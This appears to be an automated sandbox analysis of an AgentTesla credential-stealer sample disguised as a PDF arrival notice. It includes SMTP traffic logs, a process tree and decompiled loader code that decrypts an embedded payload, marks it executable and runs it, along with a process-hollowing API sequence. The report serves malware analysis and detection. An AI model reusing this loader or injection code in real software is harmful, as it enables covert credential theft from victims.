Nov 27, 2020 14:27:06.750746965 CET	587	49748	103.9.171.52	192.168.2.3	250-c5s3-4e-syd.hosting-services.net.au Hello 632922 [84.17.52.25] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Nov 27, 2020 14:27:06.768119097 CET	587	49748	103.9.171.52	192.168.2.3	421 c5s3-4e-syd.hosting-services.net.au lost input connection

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Arrivalnotice2020pdf.exe PID: 5492 Parent PID: 5648

General

Start time:	14:25:01
Start date:	27/11/2020
Path:	C:\Users\user\Desktop\Arrivalnotice2020pdf.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Arrivalnotice2020pdf.exe'
Imagebase:	0xb0000
File size:	387584 bytes
MD5 hash:	ED6F9A5ACE6367F4E532DD4EC40762AC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: conhost.exe PID: 1304 Parent PID: 5492

General

Start time:	14:25:01
Start date:	27/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: MSBuild.exe PID: 2540 Parent PID: 5492

General

Start time:	14:25:02
Start date:	27/11/2020
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
Imagebase:	0xda0000
File size:	69632 bytes
MD5 hash:	88BBB7610152B48C2B3879473B17857E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.474831985.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Arrivalnotice2020pdf.exe PID: 5492 Parent PID: 5648 Arrivalnotice2020pdf.exeCOMMON

Executed Functions

Function 000B1970, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E000B1970(void* __eflags) {
				intOrPtr _v8;
				char _v12;
				long _v16;
				char _v18;
				short _v20;
				intOrPtr _v24;
				char _v28;
				char _v30;
				short _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr* _t40;
				intOrPtr* _t43;
				void* _t44;
				intOrPtr* _t48;
				void* _t49;
				signed char _t51;
				void* _t55;
				intOrPtr* _t56;
				void* _t81;
				void* _t84;

				_v28 = 0x72657355;
				_v24 = 0x642e3233;
				_v20 = 0x6c6c;
				_v18 = 0;
				_v40 = 0x72637052;
				_v36 = 0x642e3474;
				_v32 = 0x6c6c;
				_v30 = 0;
				_t56 = E000B18D0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x8ca9ef6c);
				_t12 =  &_v28; // 0x72657355
				_v8 = E000B18D0( *_t56(_t12, _t81, _t84, _t55), 0xb4c47f55);
				_t40 = E000B18D0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x5790f301);
				_t17 =  &_v28; // 0x72657355
				_t43 = E000B18D0( *_t56(_t17), 0xc7e6f44f);
				_t44 =  *_t40(0); // executed
				 *_t43(_t44);
				_t18 =  &_v40; // 0x72637052
				_t48 = E000B18D0( *_t56(_t18), 0x958d1c17);
				_t49 =  *_t48(0, 2, 0, 1, 0,  &_v12); // executed
				if(_t49 != 0 && _t49 == 0x57) {
					_t51 = 0;
					do {
						_t20 =  &E000D0928 + _t51; // 0x198ee9
						asm("ror cl, 1");
						 *( &E000D0928 + _t51) =  !((( ~( !( *_t20) ^ 0x0000003a ^ _t51) ^ _t51) + 0x00000011 + _t51 ^ 0x00000055) + 0x00000001 ^ _t51);
						_t51 = _t51 + 1;
					} while (_t51 < 0x2005);
					VirtualProtect( &E000D0928, 0x2005, 0x40,  &_v16); // executed
					CallWindowProcW( &E000D0928, 0xd2930, 0, 0, 0);
				}
				return 0;
			}

0x000b1979
0x000b1980
0x000b1987
0x000b198d
0x000b1991
0x000b1998
0x000b199f
0x000b19a5
0x000b19c8
0x000b19ca
0x000b19dc
0x000b19f9
0x000b1a00
0x000b1a0d
0x000b1a16
0x000b1a19
0x000b1a1b
0x000b1a28
0x000b1a3b
0x000b1a42
0x000b1a49
0x000b1a50
0x000b1a50
0x000b1a5b
0x000b1a71
0x000b1a77
0x000b1a78
0x000b1a8f
0x000b1aa5
0x000b1aa5
0x000b1aad

APIs

GetConsoleWindow.KERNELBASE(00000000,?,00000000), ref: 000B1A16
RpcMgmtEpEltInqBegin.RPCRT4(00000000,00000002,00000000,00000001,00000000,000B47B2,?,00000000), ref: 000B1A3B
VirtualProtect.KERNELBASE(000D0928,00002005,00000040,?), ref: 000B1A8F
CallWindowProcW.USER32(000D0928,000D2930,00000000,00000000,00000000), ref: 000B1AA5

Strings

Rpcrt4.dllUser32.dll, xrefs: 000B1A1B, 000B1A1E
User32.dll, xrefs: 000B19CA, 000B19CD

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$BeginCallConsoleMgmtProcProtectVirtual
String ID: Rpcrt4.dllUser32.dll$User32.dll
API String ID: 546183053-2494872352
Opcode ID: f71ac988c2a139d68fc5ed2b50f30632ca1bcdc62f5756de15019651c9380cd0
Instruction ID: 75d0b616e70b12b5d54de121eb63eef9117a180735a4612e79deeae92f57b17d
Opcode Fuzzy Hash: f71ac988c2a139d68fc5ed2b50f30632ca1bcdc62f5756de15019651c9380cd0
Instruction Fuzzy Hash: 66316F71A41308AFEB00DBA588A6BDFB7E5EF49710F600065E605EB292D674E9008B65

Uniqueness

Uniqueness Score: -1.00%

Function 000B4671, Relevance: 18.1, APIs: 12, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E000B4671(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v20;
				signed int _v32;
				intOrPtr _v40;
				void* _t19;
				signed int _t20;
				intOrPtr _t28;
				signed int _t29;
				signed int _t30;
				intOrPtr _t34;
				intOrPtr _t38;
				intOrPtr _t39;
				void* _t48;
				signed int _t49;
				void* _t61;
				void* _t62;
				void* _t63;

				_t63 = __esi;
				_t62 = __edi;
				_t61 = __edx;
				_t48 = __ebx;
				while(1) {
					_t19 = E000B5AFA(_t48, _t61, _t62, _a4);
					if(_t19 != 0) {
						break;
					}
					_t20 = E000BB5A2(_t19, _a4);
					__eflags = _t20;
					if(_t20 == 0) {
						_push(1);
						_v8 = "bad allocation";
						E000B3CE0( &_v20,  &_v8);
						_v20 = 0xc91d0;
						E000B55FA( &_v20, 0xcd03c);
						asm("int3");
						_push(0x14);
						_push(0xcd128);
						E000BAF40(_t48, _t62, _t63);
						E000BBD95(1);
						__eflags =  *0xb0000 - 0x5a4d; // 0x5a4d
						if(__eflags == 0) {
							_t28 =  *0xb003c; // 0xf8
							__eflags =  *((intOrPtr*)(_t28 + 0xb0000)) - 0x4550;
							if( *((intOrPtr*)(_t28 + 0xb0000)) != 0x4550) {
								goto L6;
							} else {
								__eflags =  *((intOrPtr*)(_t28 + 0xb0018)) - 0x10b;
								if( *((intOrPtr*)(_t28 + 0xb0018)) != 0x10b) {
									goto L6;
								} else {
									_t49 = 0;
									__eflags =  *((intOrPtr*)(_t28 + 0xb0074)) - 0xe;
									if( *((intOrPtr*)(_t28 + 0xb0074)) > 0xe) {
										__eflags =  *(_t28 + 0xb00e8);
										_t13 =  *(_t28 + 0xb00e8) != 0;
										__eflags = _t13;
										_t49 = 0 | _t13;
									}
								}
							}
						} else {
							L6:
							_t49 = 0;
						}
						_v32 = _t49;
						_t29 = E000BA5B8();
						__eflags = _t29;
						if(_t29 == 0) {
							E000B4808(0x1c);
						}
						_t30 = E000BAB83(_t49, _t62);
						__eflags = _t30;
						if(_t30 == 0) {
							_t30 = E000B4808(0x10);
						}
						E000BBE7C(_t30);
						_v8 = _v8 & 0x00000000;
						E000BB79B();
						 *0x10b880 = GetCommandLineA(); // executed
						_t34 = E000BBEBC(); // executed
						 *0x108b70 = _t34;
						__eflags = E000BBA87();
						if(__eflags < 0) {
							E000BAC5E(_t49, _t61, _t62, _t63, __eflags, 8);
						}
						__eflags = E000BBCB4(_t49, _t61, _t62, _t63);
						if(__eflags < 0) {
							E000BAC5E(_t49, _t61, _t62, _t63, __eflags, 9);
						}
						__eflags = E000BAC98(_t62, _t63, 1);
						if(__eflags != 0) {
							E000BAC5E(_t49, _t61, _t62, _t63, __eflags, _t37);
						}
						_t38 =  *0x108cf8; // 0x13d0ed8
						 *0x108d18 = _t38;
						_push(_t38);
						_push( *0x108cf0);
						_push( *0x108cec); // executed
						_t39 = E000B1970(__eflags); // executed
						_t64 = _t39;
						_v40 = _t39;
						__eflags = _t49;
						if(_t49 == 0) {
							E000BAEF0(_t64);
						}
						E000BAC89();
						_v8 = 0xfffffffe;
						return E000BAF85(_t64);
					} else {
						continue;
					}
					L25:
				}
				return _t19;
				goto L25;
			}

0x000b4671
0x000b4671
0x000b4671
0x000b4671
0x000b4686
0x000b4689
0x000b4691
0x00000000
0x00000000
0x000b467c
0x000b4682
0x000b4684
0x000b4695
0x000b469e
0x000b46a5
0x000b46b3
0x000b46ba
0x000b46bf
0x000b46c0
0x000b46c2
0x000b46c7
0x000b46ce
0x000b46d9
0x000b46e0
0x000b46e6
0x000b46eb
0x000b46f5
0x00000000
0x000b46f7
0x000b46fc
0x000b4703
0x00000000
0x000b4705
0x000b4705
0x000b4707
0x000b470e
0x000b4710
0x000b4716
0x000b4716
0x000b4716
0x000b4716
0x000b470e
0x000b4703
0x000b46e2
0x000b46e2
0x000b46e2
0x000b46e2
0x000b4719
0x000b471c
0x000b4721
0x000b4723
0x000b4727
0x000b472c
0x000b472d
0x000b4732
0x000b4734
0x000b4738
0x000b473d
0x000b473e
0x000b4743
0x000b4747
0x000b4752
0x000b4757
0x000b475c
0x000b4766
0x000b4768
0x000b476c
0x000b4771
0x000b4777
0x000b4779
0x000b477d
0x000b4782
0x000b478b
0x000b478d
0x000b4790
0x000b4795
0x000b4796
0x000b479b
0x000b47a0
0x000b47a1
0x000b47a7
0x000b47ad
0x000b47b5
0x000b47b7
0x000b47ba
0x000b47bc
0x000b47bf
0x000b47bf
0x000b47c4
0x000b47f9
0x000b4807
0x00000000
0x00000000
0x00000000
0x00000000
0x000b4684
0x000b4694
0x00000000

APIs

_malloc.LIBCMT ref: 000B4689

Part of subcall function 000B5AFA: __FF_MSGBANNER.LIBCMT ref: 000B5B11
Part of subcall function 000B5AFA: __NMSG_WRITE.LIBCMT ref: 000B5B18
Part of subcall function 000B5AFA: HeapAlloc.KERNEL32(013C0000,00000000,00000001,00000000,?,00000000,?,000B7CE2,00000000,00000000,00000000,?,?,000B6B89,00000018,000CD290), ref: 000B5B3D

std::exception::exception.LIBCMT ref: 000B46A5
__CxxThrowException@8.LIBCMT ref: 000B46BA

Part of subcall function 000B55FA: RaiseException.KERNEL32(?,?,000CD720,00000000,?,?,000B10C8,00000000,000CD720,00000000), ref: 000B564B

_fast_error_exit.LIBCMT ref: 000B4727
_fast_error_exit.LIBCMT ref: 000B4738
__RTC_Initialize.LIBCMT ref: 000B473E
__ioinit0.LIBCMT ref: 000B4747
GetCommandLineA.KERNEL32(000CD128,00000014,00000018,000CD03C,?,00000001), ref: 000B474C
___crtGetEnvironmentStringsA.LIBCMT ref: 000B4757
__setargv.LIBCMT ref: 000B4761
__setenvp.LIBCMT ref: 000B4772
__cinit.LIBCMT ref: 000B4785

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _fast_error_exit$AllocCommandEnvironmentExceptionException@8HeapInitializeLineRaiseStringsThrow___crt__cinit__ioinit0__setargv__setenvp_mallocstd::exception::exception
String ID:
API String ID: 3599565352-0
Opcode ID: 1001eb2392db1f0fe75acf0a11ad34dccc2d432d1778b7853a7c8cdf625c7b24
Instruction ID: 9d3aee68e7bf2a4f9060e3c1d136d34fb17f683df3585113239c1be96ab7e1e4
Opcode Fuzzy Hash: 1001eb2392db1f0fe75acf0a11ad34dccc2d432d1778b7853a7c8cdf625c7b24
Instruction Fuzzy Hash: D731C470A84305ABEB60BBB4ED46BED37A4AF02354F140179F9049A1D3EFF59A84C752

Uniqueness

Uniqueness Score: -1.00%

Function 000D107C, Relevance: 10.7, APIs: 7, Instructions: 194filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 000D1142
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,000D1B95,81AF6D4E,000D16D8), ref: 000D116C
ReadFile.KERNELBASE(00000000,00000000,000D16D8,?,00000000,?,?,?,?,?,?,?,?,?,000D1B95,81AF6D4E), ref: 000D1183
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,000D1B95,81AF6D4E,000D16D8), ref: 000D11A5
FindCloseChangeNotification.KERNELBASE(81AF6D4E,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,000D1B95), ref: 000D1217
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00000000,00000000,00000000,?), ref: 000D1222
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,000D1B95,81AF6D4E,000D16D8,00000000), ref: 000D126D

Memory Dump Source

Source File: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
String ID:
API String ID: 656311269-0
Opcode ID: f6ae0f053a6cf607f952979d5ff6af1b5dfba3f6284cb6502cfccea08f1fd983
Instruction ID: 8e45f122253a59ae10ec60821a116f014f55692161c14d66c81e86f453df192c
Opcode Fuzzy Hash: f6ae0f053a6cf607f952979d5ff6af1b5dfba3f6284cb6502cfccea08f1fd983
Instruction Fuzzy Hash: 92517B71E00718BBDB209BF49C85BEEB6B9AF68710F10441AF911F7381EA7599508B78

Uniqueness

Uniqueness Score: -1.00%

Function 000D0934, Relevance: 6.5, APIs: 4, Instructions: 467threadprocessinjectionCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,0000000F,0000000F,0000000F,0000000F,08000004,0000000F,0000000F,?,?,00000000,7885A56E,00000000,3921378E,00000000,2FFE2C64), ref: 000D0BF9
GetThreadContext.KERNELBASE(?,?), ref: 000D0C1B
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 000D0C3E
SetThreadContext.KERNELBASE(?,00010007,?,?,?,00000004,00000000,?,?,?,?,000000FF,?,00000000,00000000,00000000), ref: 000D0E01

Memory Dump Source

Source File: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ContextProcessThread$CreateMemoryRead
String ID:
API String ID: 3262821800-0
Opcode ID: 9067c94aa9b3cf924867563f0924c048d24b322994c2c02ed61d3dd7c848485f
Instruction ID: 06dbec31dbe43b78bdfe6e0ef2734e9849ceaf9121c4bba70c398d93dd70dd7f
Opcode Fuzzy Hash: 9067c94aa9b3cf924867563f0924c048d24b322994c2c02ed61d3dd7c848485f
Instruction Fuzzy Hash: BF026C71A10318AAEF21DBA4DD41FEEB7B4FF54710F10445AE508EB2A1E7B59E80CB25

Uniqueness

Uniqueness Score: -1.00%

Function 000D22BB, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 204COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(00000000), ref: 000D2557

Strings

D, xrefs: 000D24FA
42089edaec274a908cf25898c2226371, xrefs: 000D24AD, 000D24B0

Memory Dump Source

Source File: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExitProcess
String ID: 42089edaec274a908cf25898c2226371$D
API String ID: 621844428-3398240566
Opcode ID: c85b3c9bec0eed1590cef51dfc0c7cde697e092167dbed23aabb2e2267073b1c
Instruction ID: b6a2279724951a54c6f7738c0684ceda7545a6c1dcf296bae666966dbe4bfc4e
Opcode Fuzzy Hash: c85b3c9bec0eed1590cef51dfc0c7cde697e092167dbed23aabb2e2267073b1c
Instruction Fuzzy Hash: C0917D30D0438CEEEF12CBE8D855BEDBBB5AF24705F10409AE548BA292D3B50B45DB65

Uniqueness

Uniqueness Score: -1.00%

Function 000D11C8, Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(81AF6D4E,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,000D1B95), ref: 000D1217
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00000000,00000000,00000000,?), ref: 000D1222
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,000D1B95,81AF6D4E,000D16D8,00000000), ref: 000D126D

Memory Dump Source

Source File: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FreeVirtual$ChangeCloseFindNotification
String ID:
API String ID: 34897155-0
Opcode ID: 8f4d8891dc7ff252d938eabae5a15ee75ccba64faf29c58411be1b1d99accc9d
Instruction ID: 6cdf90ef6a9085627166cee7c646c9b640375d3b74f3ef70e1c19832914cf81c
Opcode Fuzzy Hash: 8f4d8891dc7ff252d938eabae5a15ee75ccba64faf29c58411be1b1d99accc9d
Instruction Fuzzy Hash: 65118B31F00719BBCF108FA5DC85BBEBBB5AF45710F14805AEA41EA341CA32A9518BA4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 000BF47B, Relevance: 3.0, APIs: 2, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000BF47B(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}

0x000bf480
0x000bf490

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,000B9B6D,?,?,?,00000000), ref: 000BF480
UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 000BF489

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 34a606e9915c8aaae6a47df9d35e02456496e9c6879d2f63e208cbdaefa6acc3
Instruction ID: b65e060d34575578c78aa3ab45ce5bb08d7d257ed191dc87e30c00358bde62fa
Opcode Fuzzy Hash: 34a606e9915c8aaae6a47df9d35e02456496e9c6879d2f63e208cbdaefa6acc3
Instruction Fuzzy Hash: E9B0923108820CEBEB802BD1EC09F483F28EB04652F108011FA0D440609F7654248BA9

Uniqueness

Uniqueness Score: -1.00%

Function 000BF53A, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

EnumSystemLocalesEx.KERNEL32(00000000,00000000,00000000,00000000,?,000C26C0,000C275E,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 000BF548

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 6244dfdee4145dc9976c2fc7fe8d07106b8af6f13383d3e373510fd5cd6006ee
Instruction ID: cbda6413aca3df4ccbc412446e35b1ea4e533cfbcebe8038b240091190f393aa
Opcode Fuzzy Hash: 6244dfdee4145dc9976c2fc7fe8d07106b8af6f13383d3e373510fd5cd6006ee
Instruction Fuzzy Hash: 9CC0483204020CBBDF022F81EC05F993F2AFB086A0F148010FA18080708B72A520AB88

Uniqueness

Uniqueness Score: -1.00%

Function 000BF550, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(00000000,00000000,00000002,?,?,000BB501,?,?,?,00000002,00000000,00000000,00000000), ref: 000BF55F

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 7dcde9612818867b3b8e32e6ea63ef77509f857a7770376b29875f7ad1882b30
Instruction ID: c2f94b9eeed9b2d241f561e62abd9fd30168fb4485c1bafd67d3561b33b081b7
Opcode Fuzzy Hash: 7dcde9612818867b3b8e32e6ea63ef77509f857a7770376b29875f7ad1882b30
Instruction Fuzzy Hash: F8C0483200020EFBCF025FC1EC04C9A3F2AFB08260F048010FA1804030DB339930AB99

Uniqueness

Uniqueness Score: -1.00%

Function 000BF458, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000BF458(_Unknown_base(*)()* _a4) {

				return SetUnhandledExceptionFilter(_a4);
			}

0x000bf465

APIs

SetUnhandledExceptionFilter.KERNEL32(?,?,000BB620,000BB5D5), ref: 000BF45E

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c99d9250e6e17afe13604587f7efa533e121ea819b1d9360d1ef5485465c5057
Instruction ID: fdf1dd3474de1fceca506b0f5879eec8426b0a4437058316a9af4ee42378e32f
Opcode Fuzzy Hash: c99d9250e6e17afe13604587f7efa533e121ea819b1d9360d1ef5485465c5057
Instruction Fuzzy Hash: 3FA0113000020CEB8A002B82EC08888BF2CEB002A0B008022F80C000228B32A8208AA8

Uniqueness

Uniqueness Score: -1.00%

Function 000BA5B8, Relevance: 1.3, APIs: 1, Instructions: 7
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000BA5B8() {
				void* _t3;

				_t3 = GetProcessHeap();
				 *0x108ce4 = _t3;
				return 0 | _t3 != 0x00000000;
			}

0x000ba5b8
0x000ba5c5
0x000ba5cc

APIs

GetProcessHeap.KERNEL32(000B4721,000CD128,00000014,00000018,000CD03C,?,00000001), ref: 000BA5B8

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 0c5f2e32976f5bc96cdeba846110b45a6785f52c1b876c19a4327260dddd40de
Instruction ID: 5e2688ef40b35cacc479bc20088d0f23c23539424ef5e1eb52057e5cb6e6fa6f
Opcode Fuzzy Hash: 0c5f2e32976f5bc96cdeba846110b45a6785f52c1b876c19a4327260dddd40de
Instruction Fuzzy Hash: 30B012F03035024BA78C8B39AE1428A35E8670C301304403E7483C19A0DF2084509B04

Uniqueness

Uniqueness Score: -1.00%

Function 000D80D5, Relevance: 1.1, Instructions: 1072COMMON

Download Yara Rule

